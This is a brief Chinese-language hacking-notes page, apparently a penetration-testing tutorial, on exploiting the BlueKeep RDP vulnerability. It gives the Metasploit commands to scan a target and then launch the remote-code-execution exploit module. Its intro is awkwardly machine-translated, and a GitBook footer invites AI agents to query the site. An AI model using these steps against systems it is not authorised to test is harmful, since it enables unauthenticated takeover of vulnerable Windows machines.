> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/zh/ports-and-services/rdp-3389/bluekeep-exploitation.md).

# BlueKeep 利用

{% hint style="info" %}
**BlueKeep** （CVE-2019-0708）是一个影响……的严重漏洞 **RDP 协议（3389 端口）** 在较旧版本的 Windows 上。它允许 **远程代码执行（RCE）** 无需身份验证，从而促进……的传播 **蠕虫** 类型的恶意软件（如 WannaCry）。
{% endhint %}

## 使用 Metasploit 进行利用

1. **打开 Metasploit**

```
msfconsole
```

### **检查目标是否易受攻击**

使用以下模块：

```
use scanner/rdp/cve_2019_0708_bluekeep
```

* 该模块用于确认目标是否存在漏洞。

<figure><img src="/files/062620b08dcfd9a5751a56bf1128973dc5f2d9d7" alt=""><figcaption></figcaption></figure>

### **利用**

使用以下模块：

```
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
```

<figure><img src="/files/74a59cf7f3ebbdd954df8935dc89697b039776e8" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/zh/ports-and-services/rdp-3389/bluekeep-exploitation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
